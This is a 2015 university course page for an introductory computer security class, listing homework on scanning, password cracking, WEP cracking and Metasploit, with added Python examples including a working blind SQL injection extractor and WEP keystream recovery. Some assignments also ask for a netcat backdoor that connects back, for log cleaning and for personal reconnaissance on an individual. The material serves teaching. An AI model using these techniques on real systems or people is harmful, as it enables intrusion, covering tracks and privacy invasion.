Instructor:

Prof. Ying-Dar Lin (ydlin@cs.nctu.edu.tw)

TA:

張宏鉦 (changhcs@cs.nctu.edu.tw),

Ekarat (pokekarat@gmail.com),

Tuan (minhtuanthaivn@gmail.com)

汪建廷 (ctwang@cs.nctu.edu.tw)

Introduction to Computer Security, Spring 2015

Syllabus: download

TextBook:

Stuart McClure, Joel Scambray, George Kurtz, "Hacking Exposed 7: Network Security Secrets & Solutions," McGraw-Hill, July 2012.

Reference:

1. Ying-Dar Lin, Ren-Hung Hwang, Fred Baker, "Computer Networks: An Open Source Approach," Chapter 8 Network Security, McGraw-Hill, Feb 2011.

2. William Stallings, "Cryptography and Network Security, 6th edition," Prentice Hall, March 2013.

Slides:

Evolution of ICT Security, as seen from the wiretapping scandal (從監聽門事件看資通訊安全演進)

Chapter 8 (from the reference book)

Chapter1

Chapter2

Chapter3

Chapter4

Chapter5

Chapter6

Chapter7

Chapter8 (updated)

Chapter9 (updated)

Chapter10 (updated)

Chapter11

Chapter12

Scores:

Announcements:

6/2/2015

Homework #6 Ch9-Ch10 (150 points)
Due: 6/15 (Mon) at the final exam, in printed hardcopy
(format: problem, solution with explanation, screen dumps)

1. (60 points) Hacking a game ROM
    1) Learn how to hack a game ROM from this link: http://www.nintendoage.com/forum/messageview.cfm?catid=22&threadid=19733
    2) Change "2 PLAYER GAME" in the menu to "2 <Your Name> GAME", e.g., I change "2 PLAYER GAME" to "2 EKARAT GAME". Capture and paste your change.
    * You can download the target game ROM (Super Mario Adventure (SMB1 Hack).nes) here.

2. (30 points) Use your hex editor to modify any program you want, and tell us
    1) What is the target program?
    2) What is your modification? Show the captured screen of the result.

3. (30 points) Havij
    1) Install Havij (an automated SQL injection tool).
    2) Explain how to use this tool to crack (dump) a database through SQL injection.

4. (30 points) Burp Suite
    1) Install Burp Suite.
    2) Explain how to use this tool.
    3) Using Burp Suite to scan a target, what kind of information can you get?
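
The ROM task (item 1) and the hex-editor task (item 2) both come down to the same two problems: the menu text is not stored as ASCII, so you cannot simply search for "PLAYER" in the hex editor, and the replacement must be exactly as long as the original so nothing after it shifts. The script below is an added example written for this page (it is not code from the course or from the NintendoAge tutorial). The tile table it assumes (digits 0x00-0x09, letters 0x0A-0x23, space 0x24) and the sample "ROM" it builds are assumptions for the demonstration; find the real table for your ROM with the relative-search method the tutorial describes, and read the real file with open(path, "rb").

```python
"""Locate and patch a menu string inside an NES ROM image.

Added example for the HW6 hex-editing tasks; not code from the course page or
from the linked NintendoAge tutorial.
"""

# Assumed tile table (digits 0x00-0x09, letters 0x0A-0x23, space 0x24). Many
# NES titles use this layout, but confirm it against your ROM before
# trusting it: a wrong table simply finds nothing.
TILE_TABLE = {ch: i for i, ch in enumerate("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ")}
TILE_TABLE[" "] = 0x24

INES_MAGIC = b"NES\x1a"  # first four bytes of an iNES-format ROM; never touch the header


def encode(text: str) -> bytes:
    """Translate ASCII text into the ROM's tile bytes."""
    return bytes(TILE_TABLE[c] for c in text.upper())


def find_text(rom: bytes, text: str) -> list[int]:
    """Every file offset at which the tile-encoded text occurs."""
    pat = encode(text)
    hits, start = [], 0
    while (i := rom.find(pat, start)) != -1:
        hits.append(i)
        start = i + 1
    return hits


def patch_text(rom: bytes, old: str, new: str) -> bytes:
    """Overwrite the single occurrence of `old` with `new`, space-padded to the
    same width. Refuses to change the file length or to patch an ambiguous
    pattern (e.g. "PLAYER GAME" matches both menu lines)."""
    if len(new) > len(old):
        raise ValueError("replacement is longer than the original text")
    offsets = find_text(rom, old)
    if len(offsets) != 1:
        raise ValueError(f"expected exactly one match for {old!r}, found {len(offsets)}")
    out = bytearray(rom)
    off = offsets[0]
    out[off:off + len(old)] = encode(new.ljust(len(old)))
    return bytes(out)


def changed_offsets(a: bytes, b: bytes) -> list[int]:
    """Offsets whose byte differs between two equal-length images (what a hex
    editor's compare view shows you)."""
    if len(a) != len(b):
        raise ValueError("images differ in length")
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def build_sample_rom() -> bytes:
    """Constructed stand-in for a ROM: a 16-byte iNES header, 0xFF filler and a
    two-line title menu at body offset 0x100. Not real game data."""
    header = INES_MAGIC + bytes([2, 1, 0, 0]) + bytes(8)
    body = bytearray(b"\xff" * 0x200)
    menu = encode("1 PLAYER GAME") + encode("   ") + encode("2 PLAYER GAME")
    body[0x100:0x100 + len(menu)] = menu
    return header + bytes(body)


if __name__ == "__main__":
    rom = build_sample_rom()
    patched = patch_text(rom, "2 PLAYER GAME", "2 EKARAT GAME")
    assert patched[:4] == INES_MAGIC and len(patched) == len(rom)
    for off in changed_offsets(rom, patched):
        print(f"{off:06x}: {rom[off]:02x} -> {patched[off]:02x}")
```

The offsets printed are what you would paste into the report next to the before/after screen dumps. Note that "A" in PLAYER and in EKARAT coincide, so only five bytes change; a patch that changes bytes outside the text region, or the file length, is the usual reason a hacked ROM fails to boot.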

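What Havij (item 3) automates is blind SQL injection: the attacker controls part of a query, sees only whether the page rendered a record, and still reads arbitrary data out one character at a time. The example below is added for this page and is not Havij's code or code from the course; the target is a constructed in-memory SQLite database with made-up users and passwords, and the injectable lookup and its parameterised counterpart are both hypothetical application code. It uses SQLite's length(), substr() and unicode() functions; the equivalent functions on MySQL or MSSQL differ in name, which is exactly the per-DBMS knowledge the tool carries for you.

```python
"""Boolean-based blind SQL injection, the technique Havij automates.

Added example for HW6 item 3; not code from the course page or from Havij.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed target: two users with plaintext passwords (sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    db.executemany("INSERT INTO users (name, pw) VALUES (?, ?)",
                   [("admin", "s3cr3t"), ("bob", "hunter2")])
    db.commit()
    return db


def vulnerable_lookup(db: sqlite3.Connection, user_id: str) -> bool:
    """Injectable: the id parameter is spliced into the statement. Returns True
    when the page would render a record, which is all the oracle needs."""
    row = db.execute(f"SELECT name FROM users WHERE id = {user_id}").fetchone()
    return row is not None


def safe_lookup(db: sqlite3.Connection, user_id: str) -> bool:
    """Hardened: the value is bound as a parameter, so it can only be an id."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    row = db.execute("SELECT name FROM users WHERE id = ?", (uid,)).fetchone()
    return row is not None


class Oracle:
    """Wraps the vulnerable lookup and counts requests, as a tool reports."""

    def __init__(self, db: sqlite3.Connection):
        self.db, self.queries = db, 0

    def __call__(self, payload: str) -> bool:
        self.queries += 1
        return vulnerable_lookup(self.db, payload)


def extract(oracle, expr: str, max_len: int = 64) -> str:
    """Read the string produced by the SQL expression `expr` one character at a
    time. For each position a length probe checks that a character exists,
    then a binary search over printable ASCII (32..126) pins down its code in
    about seven true/false requests instead of one per candidate."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"1 AND length(({expr})) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    oracle = Oracle(db)
    pw = extract(oracle, "SELECT pw FROM users WHERE name = 'admin'")
    print(f"admin password: {pw!r} after {oracle.queries} requests")
    print("same payload against the parameterised lookup:",
          safe_lookup(db, "1 AND 1=1"))
```

The request count is the number of HTTP requests a tool would send for that one column; the log of the target web server shows the same thing, which is how the attack is detected after the fact.
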
5/18/2015

Final project report
1. Content (in English or Chinese):
    (1) project title, name, student ID,
    (2) abstract (200 words summarizing motivation, methodologies, tools, results, and lessons learned),
    (3) Motivation and Objective,
    (4) Methodologies,
    (5) Tools,
    (6) Procedures,
    (7) Results,
    (8) Lessons Learned.
    All figures and tables should be numbered and titled, such as "Figure 2 Automatic Hacking Procedure" or "Table 1 Summary and Comparison of Applied Tools". All references should be listed at the end and cited in the text, such as [3]. Screen dumps are considered figures and should be numbered and titled too. Example report formats can be found at http://speed.cis.nctu.edu.tw/~ydlin/miscPublication.html.

2. Length: 4-6 pages excluding figures/screen dumps and tables; 8-12 pages including figures/screen dumps and tables.

3. DUE: 6/19 (Fri) 2-5PM to 701 EECS (電子資訊研究大樓, Electronics and Information Research Building) in printed hardcopy

5/18/2015

Final exam: 6/15 (Mon) 10:10AM-12:00 noon

Form: open book, but no sharing of hardcopies, no electronic devices

Coverage: Ch5-Ch12

5/12/2015

Homework #5 Ch6-Ch8 (total: 210)
Due: 5/27 (Wed) in the class, in printed hardcopy
(format: problem, solution with explanation, screen dumps)

1. (30 points) Use all of WHOIS, Robtex, and PhishTank to trace back a phishing email found in your mailbox. If you don't have one, create an email account and post its address on the Web to solicit some. Show and discuss your findings.

2. (30 points) On Windows with some running processes connected to the Internet, use FTK Imager to dump memory and then the Volatility Framework to analyze the memory dump. Show the processes with network connections, and list the DLLs they have loaded.

3. (30 points) Retrieve a Poison Ivy RAT sample from the Internet. Use a program tracing tool you are familiar with to trace this RAT. Show how you trace it with your tracing tool and summarize what modules the RAT contains.

4. (20 points) Use Nmap, ike-scan (from NTA Monitor), and IKEProbe to identify whether a target VPN server supports IKE Aggressive mode. Screen dump "useful" results and explain.

5. (20 points) Use SiVuS and SIPVicious to scan a public SIP server. Screen dump "useful" results and explain.

6. (30 points) Set up your own client and an AP, or find an existing AP, running no encryption. Use Wireshark or airodump-ng to sniff and decode data frames. Show and discuss your findings.

7. (50 points) Set up your own client and an AP running WEP. Use the aircrack-ng suite to crack the WEP key by running through the steps of frame capturing, fake authentication attack, ARP replay attack, and key cracking. Show and discuss the steps you run through.

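The reason the fake-authentication and ARP-replay steps of item 7 work is a property of WEP itself, shown below in an added example written for this page (it is not aircrack-ng code or course code). WEP encrypts each frame with RC4 keyed by IV || WEP key, sends the 24-bit IV in the clear, and every ARP or IP frame starts with a fixed LLC/SNAP header, so for any captured frame the first keystream bytes are known; a frame whose entire plaintext is known (an ARP request, which the ARP-replay step makes the AP re-encrypt thousands of times under fresh IVs) yields the whole keystream for that IV. The key, IVs, MACs and packet contents below are made up for the demonstration. aircrack-ng's PTW/FMS attacks then combine those keystream bytes across tens of thousands of IVs to recover the key itself; that statistical step is not reproduced here.

```python
"""Why captured WEP frames with known headers give up the keystream.

Added example for HW5 item 7; not code from the course page or aircrack-ng.
"""
import struct
import zlib
from typing import Optional

LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")   # every ARP frame starts so
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")    # every IPv4 frame starts so


def rc4(key: bytes, n: int) -> bytes:
    """First n bytes of the RC4 keystream for `key` (KSA then PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent on the air: IV(3) | key-id(1) | RC4(IV||key) applied
    to plaintext || ICV."""
    ks = rc4(iv + key, len(plaintext) + 4)
    return iv + b"\x00" + xor(plaintext + icv(plaintext), ks)


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Decrypt with a candidate key; None if the ICV fails, which is how a
    cracker recognises a wrong key."""
    iv, body = frame[:3], frame[4:]
    pt_icv = xor(body, rc4(iv + key, len(body)))
    pt = pt_icv[:-4]
    return pt if pt_icv[-4:] == icv(pt) else None


def keystream_from_known(frame: bytes, known_plaintext: bytes) -> tuple[bytes, bytes]:
    """(IV, keystream prefix) from a frame whose leading plaintext is known:
    ciphertext XOR plaintext, no key needed."""
    return frame[:3], xor(frame[4:4 + len(known_plaintext)], known_plaintext)


def decrypt_with_keystream(frame: bytes, iv: bytes, ks: bytes) -> bytes:
    """Reuse a recovered keystream on another frame carrying the same IV."""
    if frame[:3] != iv:
        raise ValueError("different IV: this keystream does not apply")
    return xor(frame[4:4 + len(ks)], ks)


# Constructed traffic: a 40-bit key and one IV used for two frames. WEP has
# only 2^24 IVs, so reuse is inevitable and replay makes it quick.
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("000001")
ARP_REQUEST = (LLC_SNAP_ARP + struct.pack("!HHBBH", 1, 0x0800, 6, 4, 1)
               + bytes.fromhex("001122334455") + bytes([192, 168, 1, 2])
               + bytes(6) + bytes([192, 168, 1, 1]))
IP_PACKET = (LLC_SNAP_IP + bytes.fromhex("45000030000040004006") + bytes(10)
             + b"GET / HTTP/1.0\r\n")
FRAME_ARP = wep_encrypt(KEY, IV, ARP_REQUEST)
FRAME_IP = wep_encrypt(KEY, IV, IP_PACKET)

if __name__ == "__main__":
    iv, ks = keystream_from_known(FRAME_ARP, ARP_REQUEST)
    print("keystream for IV", iv.hex(), "=", ks.hex())
    print("other frame, same IV:", decrypt_with_keystream(FRAME_IP, iv, ks))
```

The same reasoning explains why airodump-ng's IV counter is the number to watch: each replayed ARP the AP answers is one more IV with eight known keystream bytes, and the cracker needs tens of thousands of them.
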
5/12/2015/8/2015

Final project proposal: due 5/27 (Wed) in the class

This one-page proposal should contain:
(1) title of the project, your name and ID,
(2) objective,
(3) methodology,
(4) tools,
(5) expected results.

5/12/2015/8/2015

Homework #4 Ch4 & Ch5 (total: 210)
Due: 5/13 (Wed) in the class, in printed hardcopy
(format: problem, solution with explanation, screen dumps)

1. (60 points) Use Cain to crack passwords on "your" Windows system with the following three methods supported by Cain.
    a) Brute-force cracking
    b) Dictionary cracking
    c) Rainbow cracking

2. (30 points) Use John the Ripper (JTR) to crack passwords on “your” Linux system.

3. (40 points) Use Metasploit to exploit a known vulnerability on a server of your choice and on a browser of your choice, respectively.

4. (20 points) After you gain access to a target host, show how you could install a backdoor program and make it accessible with netcat. You can listen on your host and wait for the backdoor to connect back.

5. (20 points) Compare the vulnerability information you can collect from three sources: Bugtraq, the Open Source Vulnerability Database (OSVDB), and Common Vulnerabilities and Exposures (CVE). Draw a table comparing them on several features.

6. (20 points) Use find to search the SUID, SGID, and world-writable files on your Linux system.

7. (20 points) Use Logclean-ng to clean the logs created during one login session on your Linux system.
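
For item 6 the shell commands are find / -perm -4000 -type f (set-uid), find / -perm -2000 -type f (set-gid) and find / -perm -0002 ! -type l (world-writable, skipping symlinks). The script below is an added example written for this page, not course code, and does the same walk in Python so the result can be triaged: a world-writable directory with the sticky bit (like /tmp) is expected, one without it is a finding, and a symlink's own mode bits are ignored just as find's ! -type l does. The sample tree it builds in a temporary directory is constructed; run scan("/") as root for the real system, since unreadable directories are silently skipped otherwise.

```python
"""Find set-uid, set-gid and world-writable files in a directory tree.

Added example for HW4 item 6; not code from the course page.
"""
import os
import stat
import tempfile


def classify(path: str) -> set[str]:
    """Tags for one path: 'suid', 'sgid', 'world-writable', 'sticky-dir'."""
    mode = os.lstat(path).st_mode
    if stat.S_ISLNK(mode):
        return set()               # a symlink's own mode bits mean nothing
    tags = set()
    if mode & stat.S_ISUID:
        tags.add("suid")
    if mode & stat.S_ISGID:
        tags.add("sgid")
    if mode & stat.S_IWOTH:
        tags.add("world-writable")
        if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
            tags.add("sticky-dir")   # /tmp-style: expected, not a finding
    return tags


def scan(root: str) -> dict[str, list[str]]:
    """Walk `root` and return root-relative paths under each tag, sorted."""
    found = {"suid": [], "sgid": [], "world-writable": [], "sticky-dir": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            for tag in classify(path):
                found[tag].append(os.path.relpath(path, root))
    for paths in found.values():
        paths.sort()
    return found


def build_sample_tree() -> str:
    """Constructed fixture imitating a few real-system cases (not real files)."""
    root = tempfile.mkdtemp(prefix="permscan-")
    layout = {                       # relative path: mode
        "bin/passwd": 0o4755,        # set-uid binary
        "bin/wall": 0o2755,          # set-gid binary
        "bin/both": 0o6755,          # both bits
        "bin/ls": 0o755,             # ordinary executable
        "var/scratch.txt": 0o666,    # world-writable file: a finding
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(b"sample")
        os.chmod(path, mode)
    os.makedirs(os.path.join(root, "tmp"))
    os.chmod(os.path.join(root, "tmp"), 0o1777)        # sticky, like /tmp
    os.makedirs(os.path.join(root, "var/drop"))
    os.chmod(os.path.join(root, "var/drop"), 0o777)    # no sticky: a finding
    os.symlink("scratch.txt", os.path.join(root, "var/link"))  # ignored
    return root


if __name__ == "__main__":
    for tag, paths in scan(build_sample_tree()).items():
        print(f"{tag:15s} {paths}")
```

When reporting on a real system, compare the set-uid list against the distribution's package manifests (rpm -V or dpkg --verify); an unexplained set-uid binary outside /usr/bin and /bin is the kind of thing the log-cleaning exercise in item 7 is meant to hide.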

4/8/2015

Homework #3 Ch2 & Ch3 (total: 180)
Due: 4/20 (Mon) at the midterm, in printed hardcopy
(format: problem, solution with explanation, screen dumps)

1. (50 points) Select a target domain and use Nmap for the following tasks.
    a) host discovery on the selected domain,
    b) port scanning on a selected host,
    c) active stack fingerprinting on the selected host,
    d) version scanning on a selected port,
    e) vulnerability scanning on the selected port.

2. (20 points) List and compare nmap-os-fingerprints (named nmap-os-db in current Nmap releases) used by Nmap and osprints.conf used by Siphon. Discuss how and why they differ.

3. (20 points) List and compare nmap-services and nmap-service-probes. Discuss how and why they differ.

4. (10 points) On a UNIX/Linux host, list /etc/inetd.conf (or /etc/xinetd.d/ on systems running xinetd). Discuss what services are being offered.

5. (30 points) Select a target domain, run Metasploit with Nmap scans and import the Nmap results into its database. Show the hosts found and their open ports.

6. (30 points) Select a website to do banner grabbing with telnet, netcat, and grendel-scan, respectively. Show and compare their results.

7. (20 points) Select a target domain to do automatic DNS enumeration by dnsenum to find subdomains, servers, and their IP addresses.
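
Items 1 and 5 meet in Nmap's XML output: a scan such as nmap -sV -O -oX scan.xml <target> (add --script vuln for the vulnerability-scanning step) writes the file that msfconsole's db_import reads, and db_nmap runs the scan and imports it in one step. The parser below is an added example written for this page (not Nmap or Metasploit code) that extracts the same host/port/service table from that XML. The document it parses is a constructed, abridged sample in Nmap's schema with documentation addresses, not the output of a real scan.

```python
"""Turn Nmap XML output into the host/port table that db_import loads.

Added example for HW3 items 1 and 5; not code from the course page, Nmap or
Metasploit.
"""
import xml.etree.ElementTree as ET

# Constructed sample (abridged to the elements used below; not a real scan).
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 192.0.2.8/29" start="1428480000">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="www.target.example" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="6.6.1p1" extrainfo="Ubuntu Linux; protocol 2.0"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.7"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed" reason="reset"/>
        <service name="https"/>
      </port>
    </ports>
    <os><osmatch name="Linux 3.2 - 4.9" accuracy="95"/></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(text: str) -> list[dict]:
    """One record per live host: address, hostname, OS guess, open ports as
    (port, protocol, service name, product/version) tuples."""
    hosts = []
    for h in ET.fromstring(text).iter("host"):
        if h.find("status").get("state") != "up":
            continue                      # host discovery says it is down
        addr = h.find("address[@addrtype='ipv4']")
        name = h.find("hostnames/hostname")
        osm = h.find("os/osmatch")        # best match from -O, if any
        open_ports = []
        for p in h.iter("port"):
            if p.find("state").get("state") != "open":
                continue
            svc = p.find("service")
            if svc is None:
                svc_name, ver = "", ""
            else:
                svc_name = svc.get("name", "")
                ver = " ".join(filter(None, (svc.get("product"), svc.get("version"))))
            open_ports.append((int(p.get("portid")), p.get("protocol"), svc_name, ver))
        hosts.append({"addr": addr.get("addr"),
                      "hostname": name.get("name") if name is not None else "",
                      "os": osm.get("name") if osm is not None else "",
                      "open_ports": sorted(open_ports)})
    return hosts


def services_table(hosts: list[dict]) -> list[str]:
    """Rows in the layout of msfconsole's `services` listing."""
    rows = []
    for h in hosts:
        for port, proto, svc_name, ver in h["open_ports"]:
            rows.append(f"{h['addr']:<16}{port:<6}{proto:<5}{svc_name:<8}{ver}")
    return rows


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_XML)
    for h in found:
        print(h["addr"], h["hostname"], "|", h["os"])
    print("\n".join(services_table(found)))
```

Keep the -oX file with the report: the product/version strings it records are what you look up in the vulnerability databases in the next homework, and the same file imports into Metasploit without re-scanning the target.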

4/7/2015

Midterm: 4/20 (Mon) in the class

Form: open book (hardcopies only, no electronic devices, no sharing of hardcopies between classmates)

Coverage:
- Evolution of ICT Security
- Network Security (ch8 of the reference book)
- ch1 - ch4

3/23/2015

Homework #2 (total: 180)
Due: 4/8 (Wed) in the class in printed hardcopy
Format: problem, solution with explanation, screen dumps

1. (20 points) Select a web site.
    1) Use "Wget" or "Teleport Pro" to mirror the site. Look for comments within comment tags. Give screen dumps and explain what you found.
    2) Use "DirBuster" with its proxy feature through "Privoxy" to enumerate hidden files and directories. Screen dump and explain the hidden files and directories you found.
2. (20 points) Look up "How I met your girlfriend" from the Black Hat 2010 demo and explain, in 0.5 page, how this was done.
3. (20 points) Select a person. Use on-line sites for phone books, social networks, information, jobs, photo management, business directories, jigsaw.com, etc. to summarize, with screen dumps and explanations, what information you can get. If your target is not in the US or not a native English speaker, you might need to use on-line sites different from those in the textbook.
4. (20 points) Google "XYZ resume firewall" and "XYZ resume intrusion detection", where "XYZ" is the name of your target company. Screen dump "useful" results and explain what you got.
5. (20 points) Select a target web site and look it up in Archive.org and in Google's cached results. Compare the differences between the archived or cached copy and the current on-line web site. Give screen dumps and explain the differences.
6. (20 points) Find the Google Hacking Database at hackersforcharity.org/ghdb/. Summarize what it has and select 3 strings to search. Screen dump and explain what you got.
7. (20 points) Select a web site. Start from whois.iana.org to find its registry, registrar, and registrant. Also select an IP address. Start from arin.net to find who owns the IP address. Show your screen dumps and explain.
8. (20 points) Select a domain name. Use nslookup to dump its DNS records. Show your screen dump and explain.
9. (20 points) Select a domain name. Use traceroute or similar tools to find the access path to that domain. Show your screen dump and explain.
10. (bonus: 40 points) Follow the case study right before Chapter 1. Select one target and run through all the tools (Tor, Vidalia, Privoxy, tor-resolve, proxychains, Nmap, socat, nc). Screen dump the process and explain what you got on your screen.

3/17/2015

Homework #1 (Chapter 8 of Computer Networks: An Open Source Approach)
Hands-on: 2, 4, 7
Written: 4, 11, 14
Due: 3/25 (Wed) in the class, in printed hardcopy